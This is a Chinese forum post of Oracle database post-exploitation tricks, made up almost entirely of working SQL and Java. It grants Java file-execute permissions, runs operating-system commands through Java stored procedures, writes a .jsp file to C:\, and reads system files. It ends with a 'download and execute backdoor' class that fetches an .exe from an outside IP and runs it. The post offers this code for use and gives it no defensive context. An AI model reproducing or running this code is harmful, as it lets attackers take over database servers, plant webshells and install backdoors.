oracle的一些小姿势

2020-09-20 06:41:42 2 6581 2


1.执行系统命令
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function QaxRunCMD2(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD((java.lang.String) return String''''; '';commit;end;') from dual;
select QaxRunCMD2('whoami') from dual;
2.oracl写文件
create or replace directory IST0_DIR as 'C:\';
grant read, write on directory IST0_DIR to 用户;
declare
isto_file utl_file.file_type;
begin
isto_file := utl_file.fopen('IST0_DIR', 'kj021320.jsp', 'W');
utl_file.fflush(isto_file);
utl_file.fclose(isto_file);
end;
3.oracl读文件
create or replace directory IST0_DIR as 'C:\Windows\System32\zh-CN\';
declare
isto_file utl_file.file_type;
fp_buffer RAW(32767);
begin
isto_file := utl_file.fopen('IST0_DIR', 'winver.exe.mui', 'R',32767); --操作系统版本信息
utl_file.get_raw (isto_file , fp_buffer,32767 );
dbms_output.put_line(fp_buffer);
utl_file.fclose(isto_file);
end;
4.oracle plsqldev.exe 执行命令-->原理执行java代码调用系统命令,界面画f8
4.1创建java源码

create or replace and compile java source named Test as
import java.io.*;
public class Test
{
public static void entry(String cmd) throws Exception
{
Process process = Runtime.getRuntime().exec(cmd);
InputStream in = process.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String line = br.readLine();
while(line!=null) {
System.out.println(line);
line = br.readLine();
}
}
}
4.2.创建存储过程


create or replace procedure cmd(p_str in varchar2)
as language java
name 'Test.entry(java.lang.String)';

4.3设置长度pl sql pluse
set serveroutput on size 5000;
call dbms_java.set_output(5000);
4.4运行存储过程
EXEC cmd('whoami'); 
4.5直接下载执行后门
import java.lang.*;
import java.io.*;
import java.net.*;
import java.util.*;

public class Hello
{
public static void entry() throws Exception
//public static void main(String[] args) throws Exception
{
try
{
String url="http://1.1.1.1:4321/xxx.exe";
String token="xxxxxxxxxxxxxxxxxxxxxxxxx";
Hello.downLoadFromUrl(url,"xxx.exe","c:\\",token);
System.out.println("下载完成");
Process process = Runtime.getRuntime().exec("cmd /k c:\\xxx.exe");
} catch (java.io.IOException e) {
System.out.println(e);
}

}


public static void downLoadFromUrl(String urlStr,String fileName,String savePath,String toekn) throws IOException
{
URL url = new URL(urlStr);
HttpURLConnection conn = (HttpURLConnection)url.openConnection();
conn.setConnectTimeout(3*1000);
conn.setRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)");
InputStream inputStream = conn.getInputStream();
byte[] getData = readInputStream(inputStream);
File saveDir = new File(savePath);
if(!saveDir.exists()){
saveDir.mkdir();
}
File file = new File(saveDir+File.separator+fileName);
FileOutputStream fos = new FileOutputStream(file);
fos.write(getData);
if(fos!=null){
fos.close();
}
if(inputStream!=null){
inputStream.close();
}
System.out.println("info:"+url+" download success");

}

public static byte[] readInputStream(InputStream inputStream) throws IOException
{
byte[] buffer = new byte[1024];
int len = 0;
ByteArrayOutputStream bos = new ByteArrayOutputStream();
while((len = inputStream.read(buffer)) != -1) {
bos.write(buffer, 0, len);
}
bos.close();
return bos.toByteArray();
}
}
TCV=666

关于作者

xkkhh16篇文章212篇回复

热爱生活,虚拟生活。

评论2次

要评论?请先  登录  或  注册